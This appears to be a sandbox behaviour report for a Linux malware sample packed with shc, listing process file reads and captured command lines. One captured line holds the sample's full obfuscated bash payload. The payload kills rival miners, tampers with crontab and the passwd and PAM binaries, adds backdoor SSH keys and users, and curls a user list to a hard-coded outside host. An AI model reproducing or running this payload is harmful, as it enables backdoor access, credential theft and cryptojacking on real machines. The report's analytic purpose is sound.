File opened for reading /proc/15/cmdline /usr/bin/pkill N/A
File opened for reading /proc/276/ctty /usr/bin/pkill N/A
File opened for reading /proc/2083/cgroup /usr/bin/pkill N/A
File opened for reading /proc/65/ctty /usr/bin/pkill N/A
File opened for reading /proc/23/ctty /usr/bin/pkill N/A
File opened for reading /proc/50/cgroup /usr/bin/pkill N/A
File opened for reading /proc/589/status /usr/bin/pkill N/A
File opened for reading /proc/196/cgroup /usr/bin/pkill N/A
File opened for reading /proc/1061/stat /usr/bin/pkill N/A
File opened for reading /proc/156/ctty /usr/bin/pkill N/A
File opened for reading /proc/5/status /usr/bin/pkill N/A
File opened for reading /proc/12/cmdline /usr/bin/pkill N/A
File opened for reading /proc/833/stat /usr/sbin/needrestart N/A
File opened for reading /proc/2087/status /usr/sbin/needrestart N/A
File opened for reading /proc/1069/status /usr/bin/pkill N/A
File opened for reading /proc/2040/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1985/cgroup /usr/bin/pkill N/A
File opened for reading /proc/31/status /usr/bin/pkill N/A
File opened for reading /proc/44/ctty /usr/bin/pkill N/A
File opened for reading /proc/1121/cgroup /usr/bin/pkill N/A
File opened for reading /proc/filesystems /usr/sbin/useradd N/A
File opened for reading /proc/193/status /usr/sbin/needrestart N/A
File opened for reading /proc/390/environ /usr/sbin/needrestart N/A
File opened for reading /proc/17/stat /usr/bin/pkill N/A
File opened for reading /proc/2292/ctty /usr/bin/pkill N/A
File opened for reading /proc/80/cmdline /usr/bin/pkill N/A
File opened for reading /proc/124/status /usr/bin/pkill N/A
File opened for reading /proc/736/environ /usr/sbin/needrestart N/A
File opened for reading /proc/1743/environ /usr/sbin/needrestart N/A
File opened for reading /proc/2175/ctty /usr/bin/pkill N/A
File opened for reading /proc/80/status /usr/bin/pkill N/A
File opened for reading /proc/440/stat /usr/bin/pkill N/A
File opened for reading /proc/1094/cgroup /usr/bin/pkill N/A
File opened for reading /proc/2249/ctty /usr/bin/pkill N/A
File opened for reading /proc/2193/cgroup /usr/bin/pkill N/A
File opened for reading /proc/390/status /usr/sbin/needrestart N/A
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/893/ctty /usr/bin/pkill N/A
File opened for reading /proc/1069/stat /usr/bin/pkill N/A
File opened for reading /proc/2238/status /usr/bin/pkill N/A
File opened for reading /proc/11/cgroup /usr/bin/pkill N/A
File opened for reading /proc/54/cmdline /usr/bin/pkill N/A

Software Deployment Tools

execution
Description Indicator Process Target
N/A N/A /usr/bin/apt-get N/A
N/A N/A /usr/bin/dpkg-split N/A
N/A N/A /usr/bin/dpkg N/A

Processes

/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383 -c exec '/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383' "$@" /tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383 -c #!/bin/bash z=" ";xFz='Vwn';SDz='b';fDz='hen';VLz='sh_';xJz='XJB';MJz='> ~';BLz='t=$';LIz='2.1';eCz='Yun';hLz='MR"';UJz='aG ';OHz='5.2';gHz='s c';RLz='4';PFz='w';YFz='ser';TFz='for';sHz='d1 ';EKz='tRG';EBz='ing';IBz='l"';OCz='|/z';eFz='$6$';kEz='uth';lz='); ';ZHz='475';hKz='wn ';sFz='yyz';rDz='xri';pCz='nin';DFz='ssh';EHz='g >';vBz='ll';dDz='" ]';FGz='h3d';jEz='h/a';JFz='ey ';kKz='rsb';RJz='d c';lBz='s"';mBz='t i';kDz='n/c';qFz='j7.';HGz='W55';DCz='c/p';bFz='rmo';fKz='& d';HEz='o -';gFz='vRN';CEz='lib';QDz=' /e';qBz=' 2>';aJz='eki';vz='/de';ODz='ont';SEz='/.s';XBz='yum';AKz='K89';QCz='ish';SCz='d: ';yEz='ory';GLz='43.';QKz='/tm';RFz='ssw';CFz='~/.';Nz='Gre';wIz='> $';YEz='eys';EIz='|| ';IGz='9vf';BHz='swd';AIz='.17';RKz='p/.';IIz='://';PHz='52.';iGz='e/.';iFz='SAx';vCz='-rf';uGz='t >';FBz=' wg';PEz='nit';xGz='/us';nCz='.xr';cDz=' "$';lKz='64=';lFz='EPo';VIz='m.d';Sz='2m'\''';TBz=' /d';fEz='g s';WCz=''\''\n';fIz='mfi';UEz='aut';XHz='et ';aKz='.x/';YHz='-q ';qGz='ome';tFz='rMl';Uz='or_';ILz='.18';ZFz='s';Pz=''\''\0';tDz='-ST';rBz='&1 ';BBz=' "i';PDz='ab';XIz='mmo';wJz='msu';LGz='2Fq';KIz='.25';MBz='-re';UKz='CP ';fGz='OME';wFz='bJl';EFz=' +i';hGz='hom';CBz='nst';OGz='/'\'' ';oDz='ed ';lIz='exe';THz='72/';IJz='x $';aGz=' sh';tGz='roo';uBz='/nu';HFz='"ss';aCz='rem';YBz=' in';ZBz='sta';WDz='ron';sIz='hto';bIz='! g';sDz='xrx';oCz='x/u';eGz=' $H';aHz='5 /';aDz='[ !';qKz='s h';XDz='tab';CDz='uni';cGz=' '\''e';WKz='/se';Vz='Off';sCz='sh ';cHz='u+s';dFz='p '\''';kCz='/va';eIz='$pa';PCz='|/f';mJz='XUh';mKz=' '\'' ';ADz='/.x';nEz='_ke';oGz='x/k';YLz='t0';BIz='8.8';BJz='wd';gKz='iso';SGz='me ';VJz='sud';HCz='rep';RIz='tms';KLz='010';LJz='=/v';QGz='u $';aLz=' "K';BKz='vGf';jCz='+x ';SFz='d';sGz='e';qIz='xpo';nz='n';MLz='?us';NIz='82:';WFz='ame';GJz='c';Yz='31m';lCz='r/t';rz=' -v';GKz='bA/';jGz='/au';cEz=' "r';wGz='n/p';cz='Blu';eDz='; t';iCz='od ';FEz=' -a';Oz='en=';jHz=' /s';nJz='HF2';NDz='/cr';OJz='ash';bCz='ovi';XEz='d_k';uDz='OP ';JLz='9:1';bBz='l 2';QFz='/pa';oBz='-to';VBz='nul';REz='f ~';uIz='sbi';Tz='Col';bJz='vrC';FFz='a ~';QJz='rad';Ez=';36';VKz='.x';SLz='his';xDz='dhc';GHz='rig';ELz=' -s';tJz='Fo6';CIz='2:6';Wz='[0m';Mz=''\''';sKz='.43';pEz='1';mGz='ed_';HJz=' xr';QHz='178';bz='33m';OBz='tal';vGz='ae ';PGz='$us';KCz='/ba';mz='the';JBz='apt';GBz='et/';RDz='tc/';gGz=''\'')';YIz='n-a';yIz='x';Kz='[0;';HLz='154';hz='$EU';eBz='fi';dCz='Ali';TKz='g S';Iz='='\''\';cCz='ng ';AJz='x/p';oHz='pam';DBz='all';HBz='cur';rGz='don';jFz='xOm';gEz='key';fJz='eIe';AFz='mkd';eKz='&>/';dIz=' pa';XKz='x/s';oz='! c';SIz='s >';jDz='/bi';nHz='/sb';KBz='-ge';NGz='vZv';RGz='rna';bHz='d >';SHz=':69';gBz='msr';HDz='r';BGz='GqX';qDz='-9 ';IKz='IRX';NKz='! -';VFz='ern';CKz='1YH';LDz='a /';VDz='c/c';xHz='85.';ez=';34';TIz='fil';ZJz='che';xIz='els';rFz='iqv';dJz='a.m';kBz='ool';TLz='tor';EGz='dOL';tCz='2&>';hDz='x/c';uCz='rm ';FKz='GsN';xCz='ar/';cKz='ure';GDz='b -';xEz='ect';uz='&> ';SKz='x ]';wDz='xmu';JDz='ttr';ZCz='e "';yGz='r/b';HKz='eTI';uHz=' ht';pDz='pki';NHz='/18';dBz=' > ';bLz='ONO';WEz='ize';hEz=' ~/';ZEz=' ];';OKz='d /';pJz='le/';CHz='mv ';jIz='ona';qEz='ys2';vKz='89:';cLz=' DI';JHz='l -';CJz='brc';aBz='ll ';rHz='| c';jKz='%1';ZIz='f $';tBz='dev';fBz=' wr';hJz='i01';WGz='$(s';pHz='_tm';qCz='ll.';IEz='e $';LCz='sh\';EDz='cro';UGz='rho';Fz='m'\''';tEz='h ]';qHz='s |';yKz='s?u';MKz=' [ ';FHz='d.o';mEz='zed';QLz='sb6';nBz='s 2';ALz='lis';hIz='h o';yFz='yLn';PLz='=$u';yJz='TMM';Dz='3[0';oEz='ys ';YKz='ecu';KEz='min';XLz='ini';FDz='nta';TEz='sh/';LHz='htt';TCz='-f1';PIz='2/p';KFz='ena';DJz='=~/';wBz='dnf';NBz='ins';iEz='.ss';HIz='ttp';JGz='uBh';QIz='am_';yBz='rs=';oIz='uie';WLz='y';xKz='0/u';fz='if ';nDz='fix';XGz='udo';vEz='rea';yCz='tmp';sEz=' -d';VHz=' cd';tz='rl ';bKz='sec';VCz='tr ';DIz='972';GGz='xrF';fLz='3.3';lHz='ms ';cFz='d -';mCz='mp/';sz=' cu';rKz='179';gz='(( ';gDz='cp ';tIz='k /';NCz='in/';RCz=''\'' |';pz='omm';Xz='Red';uEz=' "c';Lz='35m';GCz='| g';IDz='cha';nKz='| b';pBz='ols';oJz='3fT';RHz='.82';mFz='7Yx';XFz=' $u';nGz='s ';Gz='Pur';AEz=' /u';Qz='33[';bGz=' -c';YJz='el ';iJz='KI3';OEz='./i';JJz='ali';pIz='t e';MEz='rti';WIz='/co';jz='== ';bEz='en';ZDz='=/b';hFz='ZIl';hBz=' &>';JCz='bin';rJz='AoR';GIz='q h';UDz='ch ';ICz=' '\''/';MIz='78.';FLz='79.';UBz='ev/';FIz='wge';OIz='697';kIz='l p';vJz='aBv';NJz='/.b';TJz='ki ';DKz='zhz';kFz='o$K';qJz='wXq';eEz='vin';NEz='ng"';gLz='! X';DEz='/up';iz='ID ';eHz='"pa';hCz='chm';iBz=' ms';QBz=' -y';NLz='erl';iDz='hat';DLz='cd1';fFz='8ai';rEz='&1';EJz='.ba';kGz='tho';dz='e='\''';dHz=' /b';mDz='o "';lEz='ori';xz='ull';AGz='9lW';nFz='0FC';gCz='"';GEz='ed';CGz='EDn';DHz='wd.';ECz='ass';IFz='h k';BFz='ir ';JEz='n "';LEz='er ';ZLz='it0';gIz='le;';ABz='o $';XCz=''\'' '\''';WJz='o c';kHz='m_t';MCz='|/b';wCz=' /v';LBz='t -';vHz='tp:';vFz='cMO';tHz='-sO';wHz='//1';PKz='var';KJz='as ';GFz='en ';dEz='emo';VEz='hor';rIz='se_';Cz='\03';TDz='tou';lJz='epj';pKz='64)';fCz='Dun';PBz='l i';FCz='wd ';UIz='e=/';Az='Cya';hHz='han';iKz='-h ';PJz='rc';TGz='-r ';yHz='252';qz='and';BEz='sr/';WHz='1 -';uKz='4.1';HHz='cd ';aEz=' th';Jz='033';pGz='erh';yDz='pi';oFz='NDi';wz='v/n';tKz='.15';ZKz='re ';bDz=' -f';BDz='rx/';uFz='S9w';jJz='RQU';SJz='hee';KDz=' -i';aIz='e ]';LFz='ble';iHz='ged';MFz='d"';xBz='use';dKz=' </';cJz='8Hy';sBz='> /';UFz=' us';YCz=' '\'')';Zz='Yel';WBz='l';CLz='64 ';eJz='meU';uJz='97f';YDz='dir';vIz='" >';UCz=' | ';QEz='[ -';VGz='me=';EEz='dat';mIz='c.s';iIz='pti';LKz='me/';KKz='/ho';dGz='cho';Bz='n='\''';YGz=' -u';wEz='tin';gJz='m$L';KHz='sO ';LLz='ers';KGz='jAk';Hz='ple';mHz=']; ';lGz='riz';DGz='O3b';ZGz='me"';vDz='xxi';ULz='y -';aFz='do';CCz='/et';JKz='y5Y';nIz='o q';kz='0 )';fHz='ord';jBz='r-t';OLz='ist';IHz='n/';cIz=' -q';AHz='pas';BCz='at ';eLz='A V';dLz='O D';MGz='fKc';yz='ech';OFz='ado';rCz='sh';oKz='ase';wKz='101';NFz='/sh';pFz='uD6';kJz='pyY';JIz='185';UHz=' ||';FJz='shr';RBz='2>&';Rz='0;3';cBz='>&1';SBz='1 >';ACz='$(c';XJz='whe';sJz='0xU';MDz='etc';lDz='tr';MHz='p:/';az='low';DDz='.sh'; eval "$Az$Bz$Cz$Dz$Ez$Fz$z$Gz$Hz$Iz$Jz$Kz$Lz$Mz$z$Nz$Oz$Pz$Qz$Rz$Sz$z$Tz$Uz$Vz$Iz$Jz$Wz$Mz$z$Xz$Iz$Jz$Kz$Yz$Mz$z$Zz$az$Iz$Jz$Kz$bz$Mz$z$cz$dz$Cz$Dz$ez$Fz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$oz$pz$qz$rz$sz$tz$uz$vz$wz$xz$z$mz$nz$z$yz$ABz$Gz$Hz$BBz$CBz$DBz$EBz$FBz$GBz$HBz$IBz$z$JBz$KBz$LBz$MBz$NBz$OBz$PBz$CBz$DBz$QBz$sz$tz$RBz$SBz$TBz$UBz$VBz$WBz$z$XBz$QBz$YBz$ZBz$aBz$HBz$bBz$cBz$dBz$vz$wz$xz$z$eBz$z$fz$oz$pz$qz$rz$fBz$gBz$hBz$TBz$UBz$VBz$WBz$z$mz$nz$z$yz$ABz$Zz$az$BBz$CBz$DBz$EBz$iBz$jBz$kBz$lBz$z$JBz$KBz$mBz$CBz$DBz$QBz$iBz$jBz$kBz$nBz$cBz$dBz$vz$wz$xz$z$XBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$wBz$QBz$YBz$ZBz$aBz$gBz$oBz$pBz$qBz$rBz$sBz$tBz$uBz$vBz$z$eBz$z$eBz$z$xBz$yBz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$YCz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$yz$ABz$cz$ZCz$aCz$bCz$cCz$dCz$eCz$fCz$gCz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$rCz$z$kCz$lCz$mCz$nCz$oCz$pCz$ZBz$qCz$sCz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$CDz$CBz$DBz$DDz$z$eBz$z$EDz$FDz$GDz$HDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NDz$ODz$PDz$z$uCz$vCz$QDz$RDz$EDz$FDz$SDz$z$TDz$UDz$CCz$VDz$WDz$XDz$z$eBz$z$IDz$JDz$YDz$ZDz$NCz$IDz$JDz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$fz$aDz$bDz$cDz$IDz$JDz$YDz$dDz$eDz$fDz$z$gDz$kCz$lCz$mCz$nCz$hDz$iDz$VCz$jDz$kDz$iDz$lDz$z$hCz$iCz$jCz$jDz$kDz$iDz$lDz$z$yz$mDz$nDz$oDz$IDz$JDz$gCz$z$eBz$z$eBz$z$pDz$aBz$qDz$rDz$z$pDz$aBz$qDz$sDz$z$pDz$aBz$tDz$uDz$vDz$z$pDz$aBz$tDz$uDz$wDz$z$pDz$aBz$tDz$uDz$xDz$yDz$z$IDz$JDz$KDz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$IDz$JDz$FEz$AEz$BEz$CEz$DEz$EEz$oDz$tCz$TBz$UBz$VBz$WBz$z$uCz$vCz$AEz$BEz$CEz$DEz$EEz$GEz$z$yz$HEz$IEz$Az$JEz$KEz$LEz$ZBz$MEz$NEz$z$OEz$PEz$DDz$z$fz$QEz$REz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$ZEz$aEz$bEz$z$yz$HEz$IEz$Gz$Hz$cEz$dEz$eEz$fEz$sCz$gEz$lBz$z$IDz$JDz$KDz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$FEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$qEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$aDz$sEz$hEz$iEz$tEz$eDz$fDz$z$yz$HEz$IEz$Gz$Hz$uEz$vEz$wEz$fEz$sCz$YDz$xEz$yEz$gCz$z$AFz$BFz$CFz$DFz$z$eBz$z$gDz$gEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$EFz$FFz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$HFz$IFz$JFz$KFz$LFz$MFz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NFz$OFz$PFz$z$IDz$JDz$KDz$LDz$MDz$QFz$RFz$SFz$z$TFz$UFz$VFz$WFz$YBz$XFz$YFz$ZFz$z$aFz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$PGz$VFz$WFz$dBz$vz$wz$xz$qBz$rEz$z$EDz$FDz$GDz$QGz$xBz$RGz$SGz$TGz$dBz$vz$wz$xz$qBz$rEz$z$xBz$UGz$VGz$WGz$XGz$YGz$cDz$xBz$RGz$ZGz$aGz$bGz$cGz$dGz$eGz$fGz$gGz$z$uCz$vCz$XFz$YFz$hGz$iGz$DFz$jGz$kGz$lGz$mGz$gEz$nGz$sBz$tBz$uBz$aBz$RBz$pEz$z$gDz$kCz$lCz$mCz$nCz$oGz$JFz$PGz$pGz$qGz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$rGz$sGz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$tGz$uGz$TBz$UBz$VBz$bBz$cBz$z$IDz$JDz$KDz$vGz$jDz$wGz$ECz$FCz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$KDz$vGz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$CHz$jDz$wGz$ECz$FCz$jDz$wGz$ECz$DHz$lEz$EHz$TBz$UBz$VBz$bBz$cBz$z$CHz$xGz$yGz$NCz$AHz$BHz$AEz$BEz$JCz$QFz$RFz$FHz$GHz$dBz$vz$wz$xz$qBz$rEz$z$HHz$jDz$IHz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$ZHz$aHz$JCz$QFz$RFz$bHz$TBz$UBz$VBz$bBz$cBz$z$hCz$iCz$cHz$dHz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$gDz$jDz$wGz$ECz$FCz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$eHz$RFz$fHz$gHz$hHz$iHz$gCz$z$fz$aDz$bDz$jHz$JCz$QFz$kHz$lHz$mHz$mz$nz$z$HHz$nHz$NCz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$oHz$pHz$qHz$rHz$sHz$tHz$uHz$vHz$wHz$xHz$yHz$AIz$BIz$CIz$DIz$QFz$kHz$lHz$EIz$FIz$LBz$GIz$HIz$IIz$JIz$KIz$LIz$MIz$NIz$OIz$PIz$QIz$RIz$z$hCz$iCz$jCz$nHz$NCz$oHz$pHz$SIz$TBz$UBz$VBz$bBz$cBz$z$eBz$z$oHz$TIz$UIz$MDz$QFz$VIz$WIz$XIz$YIz$kEz$z$fz$QEz$ZIz$oHz$TIz$aIz$eDz$fDz$z$fz$bIz$HCz$cIz$dIz$kHz$lHz$eIz$fIz$gIz$aEz$bEz$z$yz$mDz$UEz$hIz$iIz$jIz$kIz$QIz$lIz$mIz$nIz$oIz$pIz$qIz$rIz$UEz$sIz$tIz$uIz$wGz$QIz$RIz$vIz$wIz$oHz$TIz$sGz$z$eBz$z$eBz$z$xIz$sGz$z$HHz$kCz$lCz$mCz$nCz$yIz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$AJz$ECz$BJz$z$CJz$DJz$EJz$FJz$GJz$z$fz$bIz$HCz$cIz$HJz$IJz$CJz$eDz$fDz$z$yz$mDz$JJz$KJz$AHz$BHz$LJz$xCz$yCz$ADz$BDz$AHz$BHz$vIz$MJz$NJz$OJz$PJz$z$eBz$z$eBz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$xBz$QJz$RJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$VJz$WJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$XJz$YJz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$xBz$bFz$cFz$dFz$eFz$bJz$cJz$dJz$eJz$fJz$gJz$hJz$iJz$jJz$kJz$lJz$mJz$nJz$oJz$pJz$qJz$rJz$sJz$tJz$uJz$vJz$wJz$xJz$yJz$AKz$BKz$CKz$DKz$EKz$FKz$GKz$HKz$IKz$JKz$OGz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$CHz$kCz$lCz$mCz$nCz$oGz$JFz$KKz$LKz$ZJz$aJz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$MKz$NKz$OKz$PKz$QKz$RKz$SKz$eDz$fDz$z$yz$HEz$IEz$Xz$uEz$vEz$wEz$TKz$UKz$YDz$xEz$yEz$gCz$z$AFz$BFz$kCz$lCz$mCz$VKz$z$eBz$z$fz$aDz$bDz$wCz$xCz$yCz$ADz$WKz$HBz$aIz$eDz$fDz$z$CHz$kCz$lCz$mCz$nCz$XKz$YKz$ZKz$kCz$lCz$mCz$aKz$bKz$cKz$z$hCz$iCz$jCz$kCz$lCz$mCz$aKz$bKz$cKz$z$eBz$z$kCz$lCz$mCz$aKz$bKz$cKz$dKz$tBz$uBz$aBz$eKz$tBz$uBz$aBz$fKz$gKz$hKz$iKz$jKz$z$xBz$kKz$lKz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$mKz$nKz$oKz$pKz$z$HBz$JHz$qKz$HIz$IIz$rKz$sKz$tKz$uKz$vKz$wKz$xKz$YFz$yKz$YFz$ALz$BLz$xBz$kKz$CLz$EIz$DLz$ELz$uHz$vHz$wHz$FLz$GLz$HLz$ILz$JLz$KLz$xGz$LLz$MLz$NLz$OLz$PLz$YFz$QLz$RLz$z$SLz$TLz$ULz$GJz$z$uCz$vCz$hEz$EJz$VLz$SLz$TLz$WLz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$XLz$YLz$z$uCz$vCz$YBz$ZLz$z$yz$HEz$IEz$Zz$az$aLz$bLz$cLz$dLz$eLz$fLz$gLz$hLz$z$yz$HEz$IEz$Tz$Uz$Vz" /tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/usr/bin/apt-get

[apt-get install -y msr-tools]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/bin/sh

[/bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true]

/usr/sbin/dpkg-preconfigure

[/usr/sbin/dpkg-preconfigure --apt]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-multi-arch]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-protected-field]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --configure --pending]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/var/lib/dpkg/info/man-db.postinst

[/var/lib/dpkg/info/man-db.postinst triggered /usr/share/man]

/usr/bin/setpriv

[setpriv --reuid man --regid man --init-groups -- /usr/bin/mandb -pq]

/usr/bin/mandb

[/usr/bin/mandb -pq]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/test

[/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service]

/usr/bin/test

[/usr/bin/test -S /var/run/dbus/system_bus_socket]

/usr/bin/gdbus

[/usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update]

/bin/echo

[/bin/echo]

/bin/sh

[sh -c -- test -x /usr/lib/needrestart/apt-pinvoke && /usr/lib/needrestart/apt-pinvoke -m u || true]

/usr/lib/needrestart/apt-pinvoke

[/usr/lib/needrestart/apt-pinvoke -m u]

/usr/bin/dbus-send

[dbus-send --system --dest=org.freedesktop.login1 --print-reply /org/freedesktop/login1 org.freedesktop.DBus.Properties.Get string:org.freedesktop.login1.Manager string:PreparingForShutdown]

/usr/bin/rm

[rm -f /run/needrestart/unpacked]

/usr/sbin/needrestart

[/usr/sbin/needrestart -m u]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --vm --quiet]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --container --quiet]

/usr/local/sbin/who

[who -r]

/usr/local/bin/who

[who -r]

/usr/sbin/who

[who -r]

/usr/bin/who

[who -r]

/usr/bin/python3.12

[/usr/bin/python3.12 -]

/bin/sh

[sh -c -- if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true]

/usr/bin/touch

